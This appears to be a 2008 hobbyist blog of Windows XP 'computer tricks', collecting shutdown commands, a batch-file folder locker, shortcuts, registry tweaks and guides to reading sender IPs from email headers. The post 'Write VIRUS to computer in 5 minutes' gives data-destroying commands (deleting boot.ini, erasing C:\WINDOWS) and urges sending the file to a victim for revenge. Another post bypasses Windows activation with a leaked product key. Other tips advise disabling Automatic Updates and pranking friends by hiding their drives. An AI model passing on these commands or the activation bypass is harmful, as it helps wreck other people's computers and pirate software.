The easiest way to shut down your computer is to type (shutdown –s) in to cmd “command” and that will give a message that the computer will shutdown and you have 30 seconds. But if u just type (shutdown -a) it will abort the shutdown but there are other commands. ill just start off doing the easiest 1
Shutdown –s
it will shutdown your computer in 30 seconds and display a message
shutdown –s –t 40
it will shutdown in 40 seconds but you can only go up to 86400 (24 hours) but if you make it 0 it will show no message and just shutdown
shutdown –s –c ”haha the computer is going to shutdown”
it will shutdown with a message in a box under the time
shutdown –l
it will just log you of the computer
shutdown -i
it will display the GUI shutdown window
shutdown –r
will restart the computer
shutdown –a
it will abort the shutdown
shutdown –f
will force all running applications to close
How to Shutdown PC from Command Prompt
Friday, May 16, 2008Posted in 420computerguru | 0 comments »
Best Way To Lock Your Folder Without Any Programs
Friday, May 16, 2008 1- make a new folder ( name it as you like )
2- inside this folder make a ( .txt ) file & copy inside it this:
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
3- after u copy the Commanding go to line ( 23 ) u will find this word : password here (Change it with ) any password u like.
4- After that make ‘save as’ & name as (locker.bat )
5- Now back to the folder & u will find a ( LOCKER ) commanding.
6- Click on it & u will find a new folder (Private )
7- Ok ,, now copy what u want in it & after that go to ( locker ) by click on it , it will open and ask you want lock your folder? Y/N ?

8- Type Y
9- If you want UNLOCK your folder ,go to (locker) & type your pass and you will see your private folder.
Posted in 420computerguru | 0 comments »
Enabling Right-Click on Sites that Disable It
Monday, May 05, 2008 If you use Internet Explorer 6 and 7
1.
Click “Tools”->”Internet Options”
2.
Click the “Security” tab.
3.
Click “Custom Level”
4.
Scroll down to the “scripting” section.
5.
Set “Active Scripting” to “disable” (Active scripts are programs written in Javascript)
6.
Click “Ok”. Restart your internet browser.
Note: This will disable the Javascript from being rendered by your Internet Explorer browser which would mean the right click disabled’s script in the website will not work anymore.
For Mozilla Firefox browser, these are the steps which gave the same effect (maybe be vary depending on the version).
1.
Go to “Tools” -> “Options”
2.
Click “Web Features”
3.
Untick enable JavaScript
.
.
Posted in 420computerguru | 0 comments »
PDF Trick..............(420 computer tricks)
Sunday, May 04, 2008Hey peeps now u can listen to wats there in a pdf document instead of reading the whole document....
Try out the following key
combinations for Acrobat 6.0 & 7.0:
- ctrl+ shift + b ---> To hear the whole document
ctrl + shift + v ---> To hear only the page
ctrl + shift + c ---> To resume
ctrl + shift + e ---> To stop
Posted in 420computerguru | 0 comments »
15 Secrets of Windows XP..........(420 computer tricks)
Sunday, May 04, 20081. Useful key shortcuts available:
- Windows key + D - shows the desktop
- Windows key + M - minimizes all open windows
- Windows key + Shift + M - maximizes all open windows
- Windows key + E - Runs Windows Explorer
- Windows key + R - shows the RUN dialog
- Windows key + F - shows Search window
- Windows key + Break - shows System Properties box
- Windows key + TAB - Go through taskbar applications
- Windows key + PAUSE Display the System Properties dialog box
- Windows key + U Open Utility Manager
- ALT + TAB - Cycle through opened applications
- Hold down CTRL while dragging an item to Copy it
- CTRL + ESC Display the Start menu
- ALT + ENTER View the properties for the selected item
- F4 key Display the Address bar list in My Computer or
- NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder
2. Lock Windows to protect computer
You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32.exeuser32.dll, LockWorkStation. The Windows key + L is also a shortcut to this feature.
3. Edit sysoc.inf to list all software
To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows\inf\. Just remove the word hide next to the software pack.
*Note* - use this at your own risk. Removing critical components of the system will make Windows instable.
4. Windows XP comes with IPv4 and IPv6
Windows XP comes both IPv4 and IPv6 support. To enable IPv6, you can install the protocols needed with the command "ipv6 install" in the command-prompt. Then type ipv6 /? to see the options. The installation will not remove the IPv4 protocols so your current configuration will still work.
5. Access Task Manager with shortcut
To access the Task Manager easier, you can make a shortcut that points to %windir%\system32\taskmgr.exe.
6. Stop treating ZIP files like Folders
If you don't want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll.
7. Run program as diffrent user
You can run a program as a different user. Right click an application and select Run As command.
8. Switch users leaving applications opened
You can switch users leaving the applications opened too (*NOTE* use this only when needed since it could lead to system instability).
Go to Task Manager - processes and end the process explorer.exe. This will end only your session and not all applications. Then go to Applications tab, click New task and type runas /user:domainname\username explorer.exe. A password prompt will appear to login to the desired username. The user's session will start, with all your previously applications running.
I recommend to open first a command-line prompt and type runas /? to see all the options available.
9. Rename multiple files in Windows at once
Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them.
10. Task kill feature in Windows
Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill
11. Edit features with GPEDIT.MSC
You can edit many features by running gpedit.msc. You can add log on/log off scripts here and many features.
12. Edit accounts in the command prompt
You can edit accounts by running "control userpasswords2" at the command prompt.
13. Use systeminfo.exe to see System Information
You can use the systeminfo.exe command in the command prompt to see System Information, including all Windows updates and hotfixes.
14. Disable system services for maximum performance
There are system services that you can disable to free up the system's load. To access the interface that permits you to make changes to system's services, type services.msc and the command prompt.
This is a list of services that are *usually* useless and can be safely disabled.
Alerter
Application Layer Gateway Service,
Application Management
Automatic Updates
Background Intelligent Transfer
Clipbook
Distributed Link Tracking Client
Distributed Transaction Coordinater
Error Reporting Service
Fast User Switching Compatibility
IMAPI CD-Burning
Indexing Service
IPSEC Services
Messenger
Net Logon
Net Meeting
Remote Desktop Sharing
Network DDE
Network DDE DSDM
Portable Media Serial Number
Remote Desktop Help Session Manager
Remote Registry
Secondary Logon
Smartcard
SSDP Discovery Service
Uninterruptible Power Supply
Universal Plug and Play Device Host
Upload Manager
Webclient
Wireless Zero Configuration
WMI Performance Adaptor
Note: Make sure you don't need them since some applications you're using could depend on them. If you make any application to fail by disabling any of the services, go back and enable it again.
15. Repair Windows XP by using the XP installation CD
If your system failes to start due to an error related to missing HAL.DLL, invalid Boot.ini or any other critical system boot files you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then run "attrib -H -R -S" on the C:\Boot.ini file and delete it. Run "Bootcfg /Rebuild" and then Fixboot.
Posted in 420computerguru | 1 comments »
Change folder color using iColorFolder
Sunday, May 04, 2008iColorFolder enables you to easily customize the color of each WindowsXP folder icons, using one of the standard color choices, or a custom folder skin (Aqua, Mac OS X, Vista and others).
iColorFolder is a very light soft, that doesn't stay in memory.
It uses a native functionnality of WindowsXP to be more efficient.
Discover it's simplicity: with a single right-click on a folder you colorize it ;
the necessary and only the necessary.
iColorFolder is proudly an Open-Source program.
Like the folder icons, iColorFolder makes folder navigation in Windows easier,
in this case by letting you assign colors to your folder icons,
which is done from the right-click context menu.
It also lets you assign custom icons and comes with three different icon skins,
but it also works fine if you're already using some icon customization/skin tool.
Even better, iColorFolder is open source software and takes up little memory.
Download : iColorFolder
.
Posted in 420computerguru | 0 comments »
Remov shutdown button.......(420 computer tricks)
Thursday, May 01, 2008To remove the shutdown button from the logon screen in WinXP and 2K, use regedit and navigate to the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\system change the value of the dword 'shutdownwithoutlogon' to '0'. exit regedit.
Posted in 420computerguru | 0 comments »
Try to LOCK ur folder without softwere....(420 computer tricks)
Thursday, May 01, 2008TRY to lock ur private folder
Suppose you want to lock the folder games in d: which has the path D:Games.In the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat
Create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat
Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder. try it out!!!!!!!
Important note:How to rename your text files as bat files?
Just go to my computer->tools->folder options->go to the view tab.
Now uncheck the 'Hide extensions for known file types'.Press apply.
Now rename ur text files as bat files.
Posted in 420computerguru | 0 comments »
Trick to Show ur name after time in taskbar.....(420 Computer tricks)
Thursday, May 01, 2008trick to add up ur name in place of AM and PM
Start -> Control Pannel -> Regional and LAnguage option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
IS it changed ??? Might be not ...Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time chnges in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply
Posted in 420computerguru | 0 comments »
Write VIRUS to computer in 5 minutes.........(420 computer guru)
Friday, April 25, 20081) Creating virus trick
open ur notepad n type the following.........
type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by ne name]
create the notepad in c: drive...
2)
Note: but with in seconds harddisk get damaged
create Virus in 5 minutes.......
Very easy but dangerous VirusOk, now, the trick:
The only thing you need is Notepad.
Now, to test it, create a textfile called TEST.txt(empty)
in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:Go to Notpad and
type erase C:\WINDOWS (or C:\LINUX if you have linux) and
save it again as findoutaname.cmd.
Now DON'T run the file or you'll lose your WINDOWS map.
So, that's the virus. Now to take revenge.
Send you file to your victim.
Once she/he opens it. Her/his WINDOWS/LINUX map is gone.
And have to install LINUX/WINDOWS again.
Simple explanation:Go to notepad, type erase C:\WINDOWS, save,
send to victim, once the victim opens it,
the map WINDOWS will be gone and have to install WINDOWS again...
HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!
be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok
i am not at all responsible for any of the further cause
Posted in 420computerguru | 2 comments »
LOCK ur folder without S/W ..............(420 computer guru)
Friday, April 25, 2008To hide a a folder name
"d:\game"
GO TO CMD PROMPT :
type in "d:\attrib game +s +h "
2 unlck the hide :
type in "d:\attrib game -s -h "
Posted in 420computerguru | 0 comments »
How to Hide the drives(c:,d:,e:,...etc) in Ur Computer..........(420 computer tricks)
Friday, April 25, 2008This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your computer.
So, now when you click on My Computer, no drives will be shown(all gone...).
To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....
Posted in 420computerguru | 0 comments »
How to find the IP address of the sender in Gmail.........(420 computer tricks)
Friday, April 25, 2008How to find the IP address of the sender in Gmail
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Gmail:
1.Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,* Click on More options corresponding to that thread. You should get a bunch of links.* Click on Show original.
4. You should get headers like this:Gmail headers : nameLook for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is65.119.112.245.That is be the IP address of the sender!
5. Track the IP address of the sender.
.
Posted in 420computerguru | 0 comments »
How to find the IP address of the sender in Hotmail...........(420 computer tricks)
Friday, April 25, 2008When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail.
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP addressHotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like thisHotmail headers : nameLook for Received: from followed by IP address within square brackets[].In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like thisHotmail headers : nameLook for Received: from followed by IP address within square brackets[].In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender
Posted in 420computerguru | 0 comments »
How to find the IP address of the sender in Yahoo! mail.........(420 computer tricks)
Friday, April 25, 2008When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Yahoo! Mail
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail.
5. You should see similar headers like this:Yahoo! headers : nameLook for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.That is be the IP address of the sender!
6. Track the IP address of the sender
Posted in 420computerguru | 0 comments »
Recover the lost administrators password in Windows XP........( 420 computer tricks
Friday, April 25, 2008Slightly more work needed if you lose or forget the Windows XP administrator password.
1.First reboot Windows XP in safe mode by re-starting the computer and pressing F8 repeated as the computer starts up.
2.Then (in safe mode) click Start and then click Run. In the open box type "control userpasswords2" without the quotes - I have just used quotes to differentiate what you have to type.
3.You will now have access to all the user accounts, including the administrators account and will be able to reset the lost password.
4.Just click the administrators user account, and then click Reset Password.
5.You will need to add a new password in the New password and the Confirm new password boxes, and confirm by clicking OK.
All done, you have recovered the lost adminitrators password!
Posted in 420computerguru | 0 comments »
Chat With Command Prompt..........(420 computer guru)
Wednesday, April 23, 2008All you need is your friends IP address and Command Prompt.
Posted in 420computerguru | 0 comments »
How to Restart Windows without Restarting your PC...............(420 computer guru)
Wednesday, April 23, 2008When you click on the SHUTDOWN button,
make sure to simultaneous press SHIFT Button.
If you hold the Shift key down while clicking on SHUTDOWN button,
you computer would restart without restarting the Computer.
This is equivalent to term "HOT REBOOT".
Posted in 420computerguru | 0 comments »
StarWars Movie in Command Prompt...........(420 computer guru)
Wednesday, April 23, 2008(1) opne "Run" command.
(2) type telnet towel.blinkenlights.nl
Posted in 420computerguru | 0 comments »
Make your wndows Xp GENUINE.!!
Wednesday, April 23, 20081) start > run > "regedit" (without the quotes of course)
2) go to the key:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer...and doubleclick on it.
Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!now close out regedit.
3) go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)
4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.
Now you can doenloads all the updates without activating,
and the Genuine Microsoft Validation thingy won't bug you no more!!
Works with most WinXP versions though ther r some exceptions...
Posted in 420computerguru | 0 comments »